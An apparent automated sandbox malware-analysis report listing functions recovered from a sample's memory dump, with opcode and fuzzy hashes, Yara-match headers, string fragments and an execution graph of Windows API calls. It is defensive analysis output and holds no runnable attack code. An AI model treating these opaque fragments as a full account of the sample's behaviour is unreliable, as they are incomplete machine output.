                                                        • Opcode ID: d6c3f287c8c6500dbc502ddc78457ef9a7bf6c29fcb62c12e8799de25ee18c1b
                                                        • Instruction ID: abf6f28cc453cb38f61449113184e0c73b5d0b004191b1e5b100152a2d2458ec
                                                        • Opcode Fuzzy Hash: d6c3f287c8c6500dbc502ddc78457ef9a7bf6c29fcb62c12e8799de25ee18c1b
                                                        • Instruction Fuzzy Hash: 7D11EFB6E1121CAF9B40DFE9DD409EFB7F9EF98214F14416AE915F7200E7709A148BA0
                                                        Function 04094622 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                        • Instruction ID: 7c26fbfbb3cd4c1f356053f3f3de1f8972bc264eabdbc90332fbc4620bd9f996
                                                        • Opcode Fuzzy Hash: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                        • Instruction Fuzzy Hash: 2801D2B2200108BBCB54DE9DDC81EEB77ADAF8D714F508208BA09E3240DA30FC518BA4
                                                        Function 0406FCE8 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb0e7947bb04ac6bc1201a6aaad4ddc5194e8d94ffed882ec1a4ba5ab7f66ad7
                                                        • Instruction ID: 1147e13c8e4eda9c8875733ef75174fcb1148bcc8c941bc8760ebd5e19de074c
                                                        • Opcode Fuzzy Hash: eb0e7947bb04ac6bc1201a6aaad4ddc5194e8d94ffed882ec1a4ba5ab7f66ad7
                                                        • Instruction Fuzzy Hash: 7CF027736143175BE7105E2CBC40796F7C8EB84338F290623ECAAEB281D672F4518790
                                                        Function 04093912 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60762d9e194c3a02b8b764a5a41d2212ad04625b8151097712e8384bd93e70f4
                                                        • Instruction ID: e65bec992e505443b1100b75a764268baac1e9924990c4fdbc44dd94ee78b92c
                                                        • Opcode Fuzzy Hash: 60762d9e194c3a02b8b764a5a41d2212ad04625b8151097712e8384bd93e70f4
                                                        • Instruction Fuzzy Hash: D9F01CB6200604BBDB10EE89DC81EDB77ACEF89714F408019FE09E7241D670BD118BB4
                                                        Function 04094542 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction ID: e5b29ee6e11cca3efedae69bc99c3e9877d5d24d7eb30d9c21cc62fb122cd92b
                                                        • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction Fuzzy Hash: D6E06D722042047BD614EE89EC41EDB37ACEF8A714F408018FD09A7241D630BD1087B5
                                                        Function 04083DB2 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                                                        • Instruction ID: 2022daab20b1edac2cd41e7807a3aa10219a5f6eee0889460ab5f5ce4f5b6151
                                                        • Opcode Fuzzy Hash: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                                                        • Instruction Fuzzy Hash: 21F0827190520CEBDB14DF64D841BDEBBB4EB44320F20436DEC24DB280E635A7509B81
                                                        Function 04096202 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9aacc950af60856ec951746caa9d359d9570099d1575ccbbfcff060ee1d0dda
                                                        • Instruction ID: 59c22c68a86b1af9b66653e2740cfabd0a443c638c240c701c705e446546f468
                                                        • Opcode Fuzzy Hash: a9aacc950af60856ec951746caa9d359d9570099d1575ccbbfcff060ee1d0dda
                                                        • Instruction Fuzzy Hash: 6DE0DF3264022423DA2026898C05F9B73DC8BC0E60F080128FE08AB300E26ABC0182E4
                                                        Function 04094252 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction ID: 6944160c2a2587346a714c2ff8144d357e0abb365967af5b6719edde3dbeb831
                                                        • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction Fuzzy Hash: F4E0B6362006547BD620BA5ADC42EDB77ACEFC6718F808455FE09A7241C671B95586A0

                                                        Non-executed Functions

                                                        Function 0408003D Relevance: 51.4, Strings: 41, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                        • API String ID: 0-3248090998
                                                        • Opcode ID: 1f8b8abbbbf1e3cd1e12fded52264a9c050109948fa5ce36f3251e5f8e1be36a
                                                        • Instruction ID: 2d654923b89ba7f16a08580d7e5374abbaee57f5e5783f9c5f8a809b22342837
                                                        • Opcode Fuzzy Hash: 1f8b8abbbbf1e3cd1e12fded52264a9c050109948fa5ce36f3251e5f8e1be36a
                                                        • Instruction Fuzzy Hash: 7091FFF08052A98ECB118F55A5603DEBF71BB95204F1581EDC6AA7B243C3BE4E85DF90
                                                        Function 0408B1C6 Relevance: 25.3, Strings: 20, Instructions: 251COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                        • API String ID: 0-3236418099
                                                        • Opcode ID: d53dc7dae281fef825b7a20cc6d9c4976643420f64786eddb8e9e5e4bbab50f6
                                                        • Instruction ID: 2aa5e4e358d00ec14494106d5ba66fc787ddb9a92adc392afb9ed49e9890cafc
                                                        • Opcode Fuzzy Hash: d53dc7dae281fef825b7a20cc6d9c4976643420f64786eddb8e9e5e4bbab50f6
                                                        • Instruction Fuzzy Hash: 349163B1900218AAEB10EF94CC81FEE77B9BF54708F0445ADE608B6141EB756F89DF61
                                                        Function 04086BC2 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 7f6f78bae4700dae1273215cc052f2d4df15a67024cef2cd11a7ac8ee6107261
                                                        • Instruction ID: 802a6e9151a76c4d5b60424ac4bed22fe45bc831c48d746375e56ddd0c03cef0
                                                        • Opcode Fuzzy Hash: 7f6f78bae4700dae1273215cc052f2d4df15a67024cef2cd11a7ac8ee6107261
                                                        • Instruction Fuzzy Hash: CB7151B1D00218AAEF15EF94CC40FEEB7BDBF44708F04459DE609BA140EB756B489B95
                                                        Function 04086BBA Relevance: 16.4, Strings: 13, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 9fcc275b16f0f271e4a0af19f1968f53018017527680e9ec55a5f1c0716e9830
                                                        • Instruction ID: 5688cb4b0c5221084f8715bb91c140567ab25dc0a7922f70b41dfd463dd01fd2
                                                        • Opcode Fuzzy Hash: 9fcc275b16f0f271e4a0af19f1968f53018017527680e9ec55a5f1c0716e9830
                                                        • Instruction Fuzzy Hash: 0A6151B1D00218AAEF25DFA4CC40FEEB7B9BF08308F04459DE609B6181EB756B489F55
                                                        Function 04081ED2 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                        • API String ID: 0-2356907671
                                                        • Opcode ID: 320b3e7b12be722899e2148baaf47b58793bdce683fb3b6fd03083f58a0331e1
                                                        • Instruction ID: 1eecb8ac984308ca024f830e23f25f6d972127fc714d9b5047015121b9e171ed
                                                        • Opcode Fuzzy Hash: 320b3e7b12be722899e2148baaf47b58793bdce683fb3b6fd03083f58a0331e1
                                                        • Instruction Fuzzy Hash: 408187B2C003186AEF51EBA4CC81FEF73BDAF54708F044899B509B6141EA756B58EF61
                                                        Function 0407AD3A Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                        • API String ID: 0-685823316
                                                        • Opcode ID: 6ad6f890f39681a1522870b12b5ecb80e26a319f8752f5a13a466ae04c9d78a4
                                                        • Instruction ID: 24420dddbbf6ef82779903c68caefb5f0ce3544cce42883bf9876cd724c5a4bd
                                                        • Opcode Fuzzy Hash: 6ad6f890f39681a1522870b12b5ecb80e26a319f8752f5a13a466ae04c9d78a4
                                                        • Instruction Fuzzy Hash: F73178B1D51218AAEF50DFD4CC45BEEBBB9AF44708F04815CE618BA180DBB52648CBA5
                                                        Function 0408B672 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                        • API String ID: 0-2304485323
                                                        • Opcode ID: 1e8e826f36fab50eeda812c013d92c34440ce050c58ce4fc5a40db548288060a
                                                        • Instruction ID: 6e1964bdc0da10aab647a4ec2ebb773a80904ff0441d51f5619bd8afd200dc9f
                                                        • Opcode Fuzzy Hash: 1e8e826f36fab50eeda812c013d92c34440ce050c58ce4fc5a40db548288060a
                                                        • Instruction Fuzzy Hash: 92D1DAB1A00215AFDB10EFA4CD85FEEB7F8BF48308F04491DE659A6140EB79F9059B61
                                                        Function 0408E5A2 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L$S$\$a$c$e$l
                                                        • API String ID: 0-3322591375
                                                        • Opcode ID: 39a8e789279ce5572e4b501cd2f5725856788531bb5185dea0c50e4361333bcd
                                                        • Instruction ID: 7e439a73cb30ac5f62bfecfc86280aa5251ba9ce9c1c3eea162ec77236658ef3
                                                        • Opcode Fuzzy Hash: 39a8e789279ce5572e4b501cd2f5725856788531bb5185dea0c50e4361333bcd
                                                        • Instruction Fuzzy Hash: 8641A372C10218AADF50EFA4DC84AEEB7F8EF48314F05865ED809B7110EB7169819BD0
                                                        Function 04073062 Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$,$6$C$a$c$t
                                                        • API String ID: 0-57574274
                                                        • Opcode ID: fc7786ad9086a2070782595f3e69e192bfb1185de6e34e4aa1b80cc2c2708a63
                                                        • Instruction ID: 6b1bd44a1f7f2f79ed8d003b884318f5dc6e153683aa95c2e49ed29be830664a
                                                        • Opcode Fuzzy Hash: fc7786ad9086a2070782595f3e69e192bfb1185de6e34e4aa1b80cc2c2708a63
                                                        • Instruction Fuzzy Hash: 1511AC20D082CEDDDB12C7BC84187EEBF715B12214F0886D9D9A12B2C2D2BA5755D7A6
                                                        Function 04086983 Relevance: 7.7, Strings: 6, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: 387a5b2b52e0ff5e8ae2c8ad664a9df6c6255b3d2c86f74190555daec4922255
                                                        • Instruction ID: c158ce6c8ef9317c99af35e1e47627d84783a93292eab6b702b2ae6181e878f0
                                                        • Opcode Fuzzy Hash: 387a5b2b52e0ff5e8ae2c8ad664a9df6c6255b3d2c86f74190555daec4922255
                                                        • Instruction Fuzzy Hash: 62510770900304AAEB30EFA5CD45BEAB7F8FF4431CF044A5DA58976180D7BABA84DB51
                                                        Function 0408698C Relevance: 7.5, Strings: 6, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: af1ced19f4f400ec674e182d8db03c11c5d674918c81501b8d13d3cd880eb3a5
                                                        • Instruction ID: 4aabdf09fdcf3011791e9c0aeb58f401c3101c5b9ae72126863464e25ac6535e
                                                        • Opcode Fuzzy Hash: af1ced19f4f400ec674e182d8db03c11c5d674918c81501b8d13d3cd880eb3a5
                                                        • Instruction Fuzzy Hash: 30F0A4B1D10218AADF20DFA9C909ADFBFB5FF45358F11825DD8147B200E7BA5A09CB91
                                                        Function 040860DF Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $i$l$o$u
                                                        • API String ID: 0-2051669658
                                                        • Opcode ID: 116b3b7242c56609d79cebe4d338456272df7ab4a0279181cf7646a5c4a69351
                                                        • Instruction ID: d64c9a20618533b3468be2ceff2b6daa5408e09c622dfb067b896dae7d9b5f07
                                                        • Opcode Fuzzy Hash: 116b3b7242c56609d79cebe4d338456272df7ab4a0279181cf7646a5c4a69351
                                                        • Instruction Fuzzy Hash: 5D6150B1A00304AFDB64DFA4CD80FEFB7F9AB88714F10495DE559A7240E735BA418B60
                                                        Function 040860E2 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $i$l$o$u
                                                        • API String ID: 0-2051669658
                                                        • Opcode ID: 9e4e991e4492956ac726d94c50b11d0a26535f214ceb5b1f2698dbc76302a624
                                                        • Instruction ID: 63b77193484b4623bff21330edf7dfc59bff9f479d014e8a4f907f4fef279ab5
                                                        • Opcode Fuzzy Hash: 9e4e991e4492956ac726d94c50b11d0a26535f214ceb5b1f2698dbc76302a624
                                                        • Instruction Fuzzy Hash: 3D411EB1A00308AFDB60EFA4CD84FEFBBF9AB48704F10495DE559A7240D775AA418B60
                                                        Function 04082202 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 1$3$7$9$N
                                                        • API String ID: 0-3501087661
                                                        • Opcode ID: e850785c1f55a783ce02cb035e0e0e9b559b609883e2dd08b83e483d8d5a385b
                                                        • Instruction ID: 760c5711b21510e73719ff97acb2ed9a02981776bad6077c77f2af593345d46e
                                                        • Opcode Fuzzy Hash: e850785c1f55a783ce02cb035e0e0e9b559b609883e2dd08b83e483d8d5a385b
                                                        • Instruction Fuzzy Hash: 603141B1910109BBEF10DF94CD41BEE77F8BF48308F048599E908B7240E676AE459BE5
                                                        Function 04085C34 Relevance: 5.1, Strings: 4, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • Opcode ID: a6d7b6eb5af04526e3a8dd96f55bd149529a700559cba304474225568ee30be8
                                                        • Instruction ID: f16bdfcc53e2e8dbf5da261b16a1fba86e36449250970222f365df2958596a22
                                                        • Opcode Fuzzy Hash: a6d7b6eb5af04526e3a8dd96f55bd149529a700559cba304474225568ee30be8
                                                        • Instruction Fuzzy Hash: 28413DB15111187EEB11EBE0CC42FEF77BCAF55708F048448FA447A180EB756B1597A6
                                                        Function 04085C42 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • Opcode ID: e702ba951ea7bbe6f5e04749598195cb1437089433bade041a45160a57a426a8
                                                        • Instruction ID: 7ac4cad1f04de7c7394f9f2729461d35a6157500ce16a9daeff7c2688bba9ffb
                                                        • Opcode Fuzzy Hash: e702ba951ea7bbe6f5e04749598195cb1437089433bade041a45160a57a426a8
                                                        • Instruction Fuzzy Hash: 18312DB15121187AEB11EBA0CC42FEF77BCAF55708F408448FA447A180EB757F45A7A6
                                                        Function 0408363C Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • Opcode ID: 6f5c7f93c5c407d6a2e1146690628310ff3e76f6b342f0bf9dc6b732020cdc12
                                                        • Instruction ID: 89dc939773ec3266a5e1c4d84273141f8de3069b745765a2736021b6ad8a00e5
                                                        • Opcode Fuzzy Hash: 6f5c7f93c5c407d6a2e1146690628310ff3e76f6b342f0bf9dc6b732020cdc12
                                                        • Instruction Fuzzy Hash: F811A9B1900208ABDF14DF94D8C4ADEBBF5FF44314F048509E9056B201E771E945CBA0
                                                        Function 04083642 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • Opcode ID: a81e565eb4bcf9ce83e0d49b25d6eaa29db8a5601191523d86992eb8eb7932fd
                                                        • Instruction ID: e047d908dae637dafb953ded762c916388f322ca2c450c71f59f226e0e6a62a9
                                                        • Opcode Fuzzy Hash: a81e565eb4bcf9ce83e0d49b25d6eaa29db8a5601191523d86992eb8eb7932fd
                                                        • Instruction Fuzzy Hash: DE0184B2900218ABDB14DF99D884ADEB7F9FF48718F048619E9196B201E771E945CBA0

                                                        Execution Graph

                                                        Execution Coverage:2.6%
                                                        Dynamic/Decrypted Code Coverage:4.2%
                                                        Signature Coverage:1.5%
                                                        Total number of Nodes:452
                                                        Total number of Limit Nodes:75
                                                        execution_graph 95286 2e272e0 95287 2e272f5 95286->95287 95289 2e2734f 95286->95289 95287->95289 95290 2e2aee0 95287->95290 95291 2e2af06 95290->95291 95292 2e2b122 95291->95292 95317 2e386b0 95291->95317 95292->95289 95294 2e2af7c 95294->95292 95320 2e3b3c0 95294->95320 95296 2e2af98 95296->95292 95297 2e2b066 95296->95297 95326 2e379a0 95296->95326 95299 2e259a0 LdrInitializeThunk 95297->95299 95304 2e2b085 95297->95304 95299->95304 95301 2e2affa 95301->95292 95311 2e2b02c 95301->95311 95313 2e2b04e 95301->95313 95330 2e259a0 95301->95330 95303 2e2b10a 95306 2e27e40 LdrInitializeThunk 95303->95306 95304->95303 95337 2e37570 95304->95337 95310 2e2b118 95306->95310 95310->95289 95352 2e33b60 LdrInitializeThunk 95311->95352 95312 2e2b0e1 95342 2e37610 95312->95342 95333 2e27e40 95313->95333 95315 2e2b0fb 95347 2e37750 95315->95347 95318 2e386cd 95317->95318 95319 2e386de CreateProcessInternalW 95318->95319 95319->95294 95321 2e3b330 95320->95321 95323 2e3b38d 95321->95323 95353 2e3a290 95321->95353 95323->95296 95324 2e3b36a 95356 2e3a1b0 95324->95356 95327 2e379ba 95326->95327 95365 3602c0a 95327->95365 95328 2e2aff1 95328->95297 95328->95301 95332 2e259da 95330->95332 95368 2e37b60 95330->95368 95332->95311 95334 2e27e53 95333->95334 95374 2e378b0 95334->95374 95336 2e27e7e 95336->95289 95338 2e375dc 95337->95338 95340 2e3758e 95337->95340 95380 36039b0 LdrInitializeThunk 95338->95380 95339 2e375fe 95339->95312 95340->95312 95343 2e3767f 95342->95343 95345 2e37631 95342->95345 95381 3604340 LdrInitializeThunk 95343->95381 95344 2e376a1 95344->95315 95345->95315 95348 2e377bf 95347->95348 95350 2e37771 95347->95350 95382 3602fb0 LdrInitializeThunk 95348->95382 95349 2e377e1 95349->95303 95350->95303 95352->95313 95359 2e385d0 95353->95359 95355 2e3a2ab 95355->95324 95362 2e38620 95356->95362 95358 2e3a1c9 95358->95323 95360 2e385ed 95359->95360 95361 2e385fb RtlAllocateHeap 95360->95361 95361->95355 95363 2e3863d 95362->95363 95364 2e3864b RtlFreeHeap 95363->95364 95364->95358 95366 3602c11 95365->95366 95367 3602c1f LdrInitializeThunk 95365->95367 95366->95328 95367->95328 95369 2e37bfc 95368->95369 95371 2e37b7e 95368->95371 95373 3602d10 LdrInitializeThunk 95369->95373 95370 2e37c3e 95370->95332 95371->95332 95373->95370 95375 2e37920 95374->95375 95377 2e378d1 95374->95377 95379 3602dd0 LdrInitializeThunk 95375->95379 95376 2e37942 95376->95336 95377->95336 95379->95376 95380->95339 95381->95344 95382->95349 95383 2e2f260 95384 2e2f2c4 95383->95384 95414 2e26290 95384->95414 95386 2e2f3f4 95387 2e2f3ed 95387->95386 95421 2e263a0 95387->95421 95390 2e2f593 95392 2e2f48d 95393 2e2f5a2 95392->95393 95430 2e2f040 95392->95430 95394 2e382e0 NtClose 95393->95394 95396 2e2f5ac 95394->95396 95397 2e2f4a5 